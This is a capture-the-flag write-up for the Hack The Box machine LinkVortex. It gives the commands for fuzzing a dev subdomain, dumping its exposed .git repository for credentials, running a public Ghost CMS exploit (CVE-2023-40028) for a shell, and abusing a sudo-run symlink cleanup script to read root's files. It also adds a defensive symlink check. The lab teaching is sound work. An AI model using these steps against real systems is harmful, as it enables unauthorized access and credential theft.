LinkVortex (HTB – Easy)

The machine hosts a Ghost CMS instance on the main domain and a development subdomain exposing a full .git repository. Dumping the repository reveals credentials for the Ghost admin panel. A public Ghost CMS vulnerability (CVE-2023-40028) provides RCE. Privilege escalation is achieved through a symlink abuse in a sudo-controlled cleanup script.

Overview

Target: linkvortex.htb
Initial vector: exposed .git directory → credential leak
Privilege escalation: insecure symlink handling in sudo script

Enumeration

Paths disallowed in robots.txt:

/p/
/r/
/email/
/sitemap/

Wappalyzer and WhatWeb identify the CMS:

Ghost CMS 5.58

Directory fuzzing on the main domain reveals nothing useful.

Subdomain Discovery

Fuzz virtual hosts:

$ ffuf -u http://linkvortex.htb/ -H "Host: FUZZ.linkvortex.htb" \
  -w /usr/share/wordlists/dirb/common.txt -fc 301
-> dev.linkvortex.htb

Fuzzing the dev subdomain:

$ ffuf -u http://dev.linkvortex.htb/FUZZ \
  -w /usr/share/wordlists/dirb/common.txt -fc 301
-> .git/HEAD (200)

The .git directory is fully exposed.

Dumping the Git Repository

Using git-dumper:

$ python3 git_dumper.py http://dev.linkvortex.htb ./GIT-DUMPER

Search for credentials:

$ grep -r "password" .
-> OctopiFociPilfer45

Try logging into Ghost admin:

http://linkvortex.htb/ghost
user: admin@linkvortex.htb
pass: OctopiFociPilfer45

Ghost CMS RCE (CVE-2023-40028)

Use the public exploit:

https://github.com/0xyassine/CVE-2023-40028

Run it:

$ ./exploit.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
-> RCE shell

From the shell, inspect the Ghost configuration:

/var/lib/ghost/config.production.json

Credentials found inside:

"user": "bob@linkvortex.htb",
"pass": "fibber-talented-worth"

SSH as bob:

$ ssh bob@linkvortex.htb

Privilege Escalation

Check sudo permissions:

$ sudo -l
-> allowed to run /opt/ghost/clean_symlink.sh with CHECK_CONTENT=true

With CHECK_CONTENT=true the script follows the symlink it is given and prints the contents of the target file. Because it runs as root via sudo, this is an arbitrary file read.

Exploit:

$ ln -s /root/root.txt /home/bob/f1.txt
$ ln -s /home/bob/f1.txt /home/bob/f1.png
$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/f1.png

The script prints the contents of /root/root.txt.
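As an added example (not the page's /opt/ghost/clean_symlink.sh, whose source is not shown), this is the check a root-run cleanup script could make so that a symlink chain like the one above is rejected rather than read: the link is resolved through every hop before the target is compared against an allowed directory. The ALLOWED_ROOT path, the function name and the demo directory tree are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not the page's clean_symlink.sh. ALLOWED_ROOT is an assumed
# location for Ghost's image uploads; override it in the environment if needed.
ALLOWED_ROOT="${ALLOWED_ROOT:-/var/www/ghost/content/images}"

# check_symlink LINK
# Returns 0 only if LINK is a symlink whose fully resolved target (every hop,
# not just the first) is a regular file beneath ALLOWED_ROOT.
# A chain such as f1.png -> f1.txt -> /root/root.txt is rejected because
# readlink -f resolves it to /root/root.txt before the prefix check runs.
check_symlink() {
  link="$1"
  [ -L "$link" ] || { echo "skip: not a symlink: $link"; return 1; }
  root=$(readlink -f -- "$ALLOWED_ROOT") || return 1
  target=$(readlink -f -- "$link") || return 1
  case "$target" in
    "$root"/*) ;;
    *) echo "reject: $link resolves outside $root ($target)"; return 2 ;;
  esac
  [ -f "$target" ] || { echo "reject: $target is not a regular file"; return 3; }
  echo "ok: $link -> $target"
  return 0
}

# Self-contained demo on a constructed temporary tree; no real system paths are touched.
demo() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/images"
  echo "png bytes" > "$tmp/images/photo.png"
  echo "top secret" > "$tmp/secret.txt"
  ln -s "$tmp/images/photo.png" "$tmp/good.png"   # legitimate image link: accepted
  ln -s "$tmp/secret.txt" "$tmp/hop.txt"           # first hop of a chain
  ln -s "$tmp/hop.txt" "$tmp/chain.png"            # looks like an image, resolves elsewhere: rejected
  ALLOWED_ROOT="$tmp/images"
  for f in good.png chain.png images/photo.png; do
    check_symlink "$tmp/$f" || true
  done
  rm -rf "$tmp"
}

demo
```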

Notes

The machine is intentionally brittle:

Conclusion

LinkVortex relies on an exposed .git directory to leak admin credentials, followed by Ghost CMS RCE and a symlink-based privilege escalation. Once the cleanup script is abused, full system compromise is achieved.